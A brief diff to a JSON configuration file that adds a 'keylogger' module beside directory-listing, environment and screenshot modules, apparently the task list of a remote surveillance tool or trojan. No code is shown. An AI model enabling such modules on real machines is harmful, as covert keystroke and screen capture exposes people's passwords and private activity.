--- a/config/config.json
+++ b/config/config.json
@@ -1,5 +1,6 @@
 [
     {"module": "dirlister"},
     {"module": "environment"},
-    {"module": "screenshotter"}
+    {"module": "screenshotter"},
+    {"module": "keylogger"}
 ]
